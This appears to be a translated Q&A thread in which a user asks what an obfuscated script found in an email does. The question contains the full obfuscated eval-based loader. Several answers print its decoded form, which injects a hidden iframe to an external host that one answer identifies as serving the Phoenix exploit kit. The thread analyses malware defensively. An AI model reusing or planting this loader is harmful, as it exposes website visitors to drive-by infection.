我在电子邮件中找到了这个。有人能告诉我它想要做什么吗?我担心它可能是恶意的。
我在网上看到这可能只是“优化的javascript”。有没有办法取消它,看看它想要做什么?
<script>
c=2;
i=c-2;
if(parseInt("0123")===83)
if(window.document)
try{new String("asd").prototype.q}
catch(egewgsd){
f=['-29i-29i67i64i-6i2i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i3i85i-25i-29i-29i-29i67i64i76i59i71i63i76i2i3i21i-25i-29i-29i87i-6i63i70i77i63i-6i85i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i81i76i67i78i63i2i-4i22i67i64i76i59i71i63i-6i77i76i61i23i1i66i78i78i74i20i9i9i77i79i71i59i78i76i59i72i73i75i79i63i8i76i79i20i18i10i18i10i9i72i59i80i67i65i59i78i73i76i9i68i79i63i73i59i76i67i78i68i79i67i76i8i74i66i74i1i-6i81i67i62i78i66i23i1i11i10i1i-6i66i63i67i65i66i78i23i1i11i10i1i-6i77i78i83i70i63i23i1i80i67i77i67i60i67i70i67i78i83i20i66i67i62i62i63i72i21i74i73i77i67i78i67i73i72i20i59i60i77i73i70i79i78i63i21i70i63i64i78i20i10i21i78i73i74i20i10i21i1i24i22i9i67i64i76i59i71i63i24i-4i3i21i-25i-29i-29i87i-25i-29i-29i64i79i72i61i78i67i73i72i-6i67i64i76i59i71i63i76i2i3i85i-25i-29i-29i-29i80i59i76i-6i64i-6i23i-6i62i73i61i79i71i63i72i78i8i61i76i63i59i78i63i31i70i63i71i63i72i78i2i1i67i64i76i59i71i63i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i77i76i61i1i6i1i66i78i78i74i20i9i9i77i79i71i59i78i76i59i72i73i75i79i63i8i76i79i20i18i10i18i10i9i72i59i80i67i65i59i78i73i76i9i68i79i63i73i59i76i67i78i68i79i67i76i8i74i66i74i1i3i21i64i8i77i78i83i70i63i8i80i67i77i67i60i67i70i67i78i83i23i1i66i67i62i62i63i72i1i21i64i8i77i78i83i70i63i8i74i73i77i67i78i67i73i72i23i1i59i60i77i73i70i79i78i63i1i21i64i8i77i78i83i70i63i8i70i63i64i78i23i1i10i1i21i64i8i77i78i83i70i63i8i78i73i74i23i1i10i1i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i81i67i62i78i66i1i6i1i11i10i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i66i63i67i65i66i78i1i6i1i11i10i1i3i21i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i8i59i74i74i63i72i62i29i66i67i70i62i2i64i3i21i-25i-29i-29i87']
[0].split('i');
md='a';
v="eval";
}
if(v)e=window[v];
w=f;
s=[];
r=String;
for(;617!=i;i+=1){j=i;s+=r["fromCharCode"](38+1*w[j]);}
if(f)z=s;
e(z);
</script>
答案 0 :(得分:4)
if (document.getElementsByTagName('body')[0]) {
iframer();
}
else {
document.write("<iframe src='http://sumatranoque.ru:8080/navigator/jueoaritjuir.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://sumatranoque.ru:8080/navigator/jueoaritjuir.php');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
答案 1 :(得分:3)
它会打开一个加载Phoenix exploit kit的IFrame。要查看Javascript代码,请将“eval”更改为“alert”。这是:
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("<iframe src='http://sumatranoque.ru:8080/navigator/jueoaritjuir.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://sumatranoque.ru:8080/navigator/jueoaritjuir.php');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
答案 2 :(得分:1)
如果您用console.log(z)替换最后一行并将其粘贴到例如谷歌Chrome控制台,您将获得代码......
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='http://sumatranoque.ru:8080/navigator/jueoaritjuir.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');f.setAttribute('src','http://sumatranoque.ru:8080/navigator/jueoaritjuir.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
答案 3 :(得分:1)
打印输出而不是允许它执行; http://jsfiddle.net/alexk/gCFAY/
尝试在IFRAME中创建和加载网址。
答案 4 :(得分:0)
编辑:其他人都发布了代码。
我去了网站。它有一些似乎包含木马的java小程序。避免!